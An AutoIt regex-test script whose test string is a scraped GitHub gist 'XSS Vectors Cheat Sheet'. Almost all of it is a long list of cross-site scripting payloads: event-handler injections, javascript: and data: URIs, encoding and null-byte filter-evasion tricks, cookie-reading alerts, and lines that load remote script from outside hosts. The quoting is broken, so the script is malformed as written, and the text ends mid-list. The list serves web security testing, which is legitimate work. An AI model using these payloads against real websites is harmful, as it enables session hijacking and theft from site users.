#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?m)((\%3C)|<)((\%2F)|\/)*([^\/b\na@>][^b][^>]*|b[^>]+|a[^>]+)((\%3E)|>)"
Local $sString = "Skip to content" & @CRLF & _
" " & @CRLF & _
"Search…" & @CRLF & _
"All gists" & @CRLF & _
"Back to GitHub" & @CRLF & _
"Sign in" & @CRLF & _
"Sign up" & @CRLF & _
"Instantly share code, notes, and snippets." & @CRLF & _
"" & @CRLF & _
"@kurobeats kurobeats/xss_vectors.txt" & @CRLF & _
"Last active 2 days ago" & @CRLF & _
"18178" & @CRLF & _
" Code Revisions 2 Stars 180 Forks 78" & @CRLF & _
"<script src="https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45.js"></script>" & @CRLF & _
"" & @CRLF & _
"<div/onmouseover='alert(1)'> style="x:">" & @CRLF & _
"<--`<img/src=` onerror=alert(1)> --!>" & @CRLF & _
"" & @CRLF & _
"XSS Vectors Cheat Sheet" & @CRLF & _
" xss_vectors.txt" & @CRLF & _
"%253Cscript%253Ealert('XSS')%253C%252Fscript%253E" & @CRLF & _
"<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";" & @CRLF & _
"<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">" & @CRLF & _
"<INPUT TYPE="BUTTON" action="alert('XSS')"/>" & @CRLF & _
""><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>" & @CRLF & _
""><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" & @CRLF & _
"<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" & @CRLF & _
"<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>" & @CRLF & _
""><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" & @CRLF & _
""></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF" & @CRLF & _
""><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>" & @CRLF & _
""><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>" & @CRLF & _
"><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr" & @CRLF & _
"g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250" & @CRLF & _
"<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>" & @CRLF & _
""><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>" & @CRLF & _
""><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" & @CRLF & _
"<iframe src=http://xss.rocks/scriptlet.html <" & @CRLF & _
"<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" & @CRLF & _
"<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>" & @CRLF & _
"<iframe src="	javascript:prompt(1)	">" & @CRLF & _
"<svg><style>{font-family:'<iframe/onload=confirm(1)>'" & @CRLF & _
"<input/onmouseover="javaSCRIPT:confirm(1)"" & @CRLF & _
"<sVg><scRipt >alert(1) {Opera}" & @CRLF & _
"<img/src=`` onerror=this.onerror=confirm(1) " & @CRLF & _
"<form><isindex formaction="javascript:confirm(1)"" & @CRLF & _
"<img src=``
 onerror=alert(1)
" & @CRLF & _
"<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>" & @CRLF & _
"<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?" & @CRLF & _
"<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">" & @CRLF & _
"<script /**/>/**/alert(1)/**/</script /**/" & @CRLF & _
""><h1/onmouseover='\u0061lert(1)'>" & @CRLF & _
"<iframe/src="data:text/html,<svg onload=alert(1)>">" & @CRLF & _
"<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>" & @CRLF & _
"<svg><script xlink:href=data:,window.open('https://www.google.com/') </script" & @CRLF & _
"<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}" & @CRLF & _
"<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">" & @CRLF & _
"<iframe src=javascript:alert(document.location)>" & @CRLF & _
"<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>" & @CRLF & _
"<img/	  src=`~` onerror=prompt(1)>" & @CRLF & _
"<form><iframe 	  src="javascript:alert(1)" 	;>" & @CRLF & _
"<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a" & @CRLF & _
"http://www.google<script .com>alert(document.location)</script" & @CRLF & _
"<a href=[�]"� onmouseover=prompt(1)//">XYZ</a" & @CRLF & _
"<img/src=@  onerror = prompt('1')" & @CRLF & _
"<style/onload=prompt('XSS')" & @CRLF & _
"<script ^__^>alert(String.fromCharCode(49))</script ^__^" & @CRLF & _
"</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(" & @CRLF & _
"�</form><input type="date" onfocus="alert(1)">" & @CRLF & _
"<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>" & @CRLF & _
"<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/" & @CRLF & _
"<iframe srcdoc='<body onload=prompt(1)>'>" & @CRLF & _
"<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>" & @CRLF & _
"<script ~~~>alert(0%0)</script ~~~>" & @CRLF & _
"<style/onload=<!--	> alert (1)>" & @CRLF & _
"<///style///><span %2F onmousemove='alert(1)'>SPAN" & @CRLF & _
"<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)" & @CRLF & _
""><svg><style>{-o-link-source:'<body/onload=confirm(1)>'" & @CRLF & _
" <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}" & @CRLF & _
"<marquee onstart='javascript:alert(1)'>^__^" & @CRLF & _
"<div/style="width:expression(confirm(1))">X</div> {IE7}" & @CRLF & _
"<iframe// src=javaSCRIPT:alert(1)" & @CRLF & _
"//<form/action=javascript:alert(document.cookie)><input/type='submit'>//" & @CRLF & _
"/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>" & @CRLF & _
"//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\" & @CRLF & _
"</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>" & @CRLF & _
"<a/href="javascript: javascript:prompt(1)"><input type="X">" & @CRLF & _
"</plaintext\></|\><plaintext/onmouseover=prompt(1)" & @CRLF & _
"</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}" & @CRLF & _
"<a href="javascript:\u0061le%72t(1)"><button>" & @CRLF & _
"<div onmouseover='alert(1)'>DIV</div>" & @CRLF & _
"<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">" & @CRLF & _
"<a href="jAvAsCrIpT:alert(1)">X</a>" & @CRLF & _
"<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">" & @CRLF & _
"<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">" & @CRLF & _
"<var onmouseover="prompt(1)">On Mouse Over</var>" & @CRLF & _
"<a href=javascript:alert(document.cookie)>Click Here</a>" & @CRLF & _
"<img src="/" =_=" title="onerror='prompt(1)'">" & @CRLF & _
"<%<!--'%><script>alert(1);</script -->" & @CRLF & _
"<script src="data:text/javascript,alert(1)"></script>" & @CRLF & _
"<iframe/src \/\/onload = prompt(1)" & @CRLF & _
"<iframe/onreadystatechange=alert(1)" & @CRLF & _
"<svg/onload=alert(1)" & @CRLF & _
"<input value=<><iframe/src=javascript:confirm(1)" & @CRLF & _
"<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>" & @CRLF & _
"http://www.<script>alert(1)</script .com" & @CRLF & _
"<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>" & @CRLF & _
"<svg><script ?>alert(1)" & @CRLF & _
"<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>" & @CRLF & _
"<img src=`xx:xx`onerror=alert(1)>" & @CRLF & _
"<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>" & @CRLF & _
"<meta http-equiv="refresh" content="0;javascript:alert(1)"/>" & @CRLF & _
"<math><a xlink:href="//jsfiddle.net/t846h/">click" & @CRLF & _
"<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>" & @CRLF & _
"<svg contentScriptType=text/vbs><script>MsgBox+1" & @CRLF & _
"<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a" & @CRLF & _
"<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>" & @CRLF & _
"<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+" & @CRLF & _
"<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F" & @CRLF & _
"<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script" & @CRLF & _
"<object data=javascript:\u0061le%72t(1)>" & @CRLF & _
"<script>+-+-1-+-+alert(1)</script>" & @CRLF & _
"<body/onload=<!-->
alert(1)>" & @CRLF & _
"<script itworksinallbrowsers>/*<script* */alert(1)</script" & @CRLF & _
"<img src ?itworksonchrome?\/onerror = alert(1)" & @CRLF & _
"<svg><script>//
confirm(1);</script </svg>" & @CRLF & _
"<svg><script onlypossibleinopera:-)> alert(1)" & @CRLF & _
"<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe" & @CRLF & _
"<script x> alert(1) </script 1=2" & @CRLF & _
"<div/onmouseover='alert(1)'> style="x:">" & @CRLF & _
"<--`<img/src=` onerror=alert(1)> --!>" & @CRLF & _
"<script/src=data:text/javascript,alert(1)></script>" & @CRLF & _
"<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>" & @CRLF & _
""><img src=x onerror=window.open('https://www.google.com/');>" & @CRLF & _
"<form><button formaction=javascript:alert(1)>CLICKME" & @CRLF & _
"<math><a xlink:href="//jsfiddle.net/t846h/">click" & @CRLF & _
"<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>" & @CRLF & _
"<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>" & @CRLF & _
"<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>" & @CRLF & _
"<script\x20type="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x3Etype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x0Dtype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x09type="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x0Ctype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x2Ftype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x0Atype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"'`"><\x3Cscript>javascript:alert(1)</script> " & @CRLF & _
"'`"><\x00script>javascript:alert(1)</script>" & @CRLF & _
"<img src=1 href=1 onerror="javascript:alert(1)"></img>" & @CRLF & _
"<audio src=1 href=1 onerror="javascript:alert(1)"></audio>" & @CRLF & _
"<video src=1 href=1 onerror="javascript:alert(1)"></video>" & @CRLF & _
"<body src=1 href=1 onerror="javascript:alert(1)"></body>" & @CRLF & _
"<image src=1 href=1 onerror="javascript:alert(1)"></image>" & @CRLF & _
"<object src=1 href=1 onerror="javascript:alert(1)"></object>" & @CRLF & _
"<script src=1 href=1 onerror="javascript:alert(1)"></script>" & @CRLF & _
"<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>" & @CRLF & _
"<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>" & @CRLF & _
"<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>" & @CRLF & _
"<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>" & @CRLF & _
"<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>" & @CRLF & _
"<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>" & @CRLF & _
"<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>" & @CRLF & _
"<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>" & @CRLF & _
"<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>" & @CRLF & _
"<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>" & @CRLF & _
"<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>" & @CRLF & _
"<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>" & @CRLF & _
"<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>" & @CRLF & _
"<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>" & @CRLF & _
"<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>" & @CRLF & _
"<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>" & @CRLF & _
"<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>" & @CRLF & _
"<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>" & @CRLF & _
"<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>" & @CRLF & _
"<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>" & @CRLF & _
"<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>" & @CRLF & _
"<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>" & @CRLF & _
"<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>" & @CRLF & _
"<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>" & @CRLF & _
"<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>" & @CRLF & _
"<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>" & @CRLF & _
"<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>" & @CRLF & _
"<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>" & @CRLF & _
"<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>" & @CRLF & _
"<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>" & @CRLF & _
"<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>" & @CRLF & _
"<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>" & @CRLF & _
"<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>" & @CRLF & _
"<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>" & @CRLF & _
"<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>" & @CRLF & _
"<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>" & @CRLF & _
"<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>" & @CRLF & _
"<object onError object onError="javascript:javascript:alert(1)"></object onError>" & @CRLF & _
"<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>" & @CRLF & _
"<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>" & @CRLF & _
"<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>" & @CRLF & _
"<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>" & @CRLF & _
"<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>" & @CRLF & _
"<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>" & @CRLF & _
"<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>" & @CRLF & _
"<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>" & @CRLF & _
"<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>" & @CRLF & _
"<body onload body onload="javascript:javascript:alert(1)"></body onload>" & @CRLF & _
"<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>" & @CRLF & _
"<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>" & @CRLF & _
"<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>" & @CRLF & _
"<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>" & @CRLF & _
"<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>" & @CRLF & _
"<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>" & @CRLF & _
"<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>" & @CRLF & _
"<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>" & @CRLF & _
"<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>" & @CRLF & _
"<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>" & @CRLF & _
"\x3Cscript>javascript:alert(1)</script>" & @CRLF & _
"'"`><script>/* *\x2Fjavascript:alert(1)// */</script>" & @CRLF & _
"<script>javascript:alert(1)</script\x0D" & @CRLF & _
"<script>javascript:alert(1)</script\x0A" & @CRLF & _
"<script>javascript:alert(1)</script\x0B" & @CRLF & _
"<script charset="\x22>javascript:alert(1)</script>" & @CRLF & _
"<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->" & @CRLF & _
"--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->" & @CRLF & _
"--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->" & @CRLF & _
"--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->" & @CRLF & _
"--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->" & @CRLF & _
"`"'><img src='#\x27 onerror=javascript:alert(1)>" & @CRLF & _
"<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
""'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>" & @CRLF & _
"<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<script>/* *\x2A/javascript:alert(1)// */</script>" & @CRLF & _
"<script>/* *\x00/javascript:alert(1)// */</script>" & @CRLF & _
"<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>" & @CRLF & _
"<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>" & @CRLF & _
"<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>" & @CRLF & _
"<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>" & @CRLF & _
"<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>" & @CRLF & _
""'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF " & @CRLF & _
""'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF " & @CRLF & _
"<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>" & @CRLF & _
"<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>" & @CRLF & _
"<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>" & @CRLF & _
"'`"><\x3Cscript>javascript:alert(1)</script>" & @CRLF & _
"'`"><\x00script>javascript:alert(1)</script>" & @CRLF & _
""'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>" & @CRLF & _
""'`><\x00img src=xxx:x onerror=javascript:alert(1)>" & @CRLF & _
"<script src="data:text/plain\x2Cjavascript:alert(1)"></script>" & @CRLF & _
"<script src="data:\xD4\x8F,javascript:alert(1)"></script>" & @CRLF & _
"<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>" & @CRLF & _
"<script src="data:\xCB\x8F,javascript:alert(1)"></script>" & @CRLF & _
"<script\x20type="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x3Etype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x0Dtype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x09type="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x0Ctype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x2Ftype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"<script\x0Atype="text/javascript">javascript:alert(1);</script>" & @CRLF & _
"ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:expression\x5C(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:expression\x00(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF" & @CRLF & _
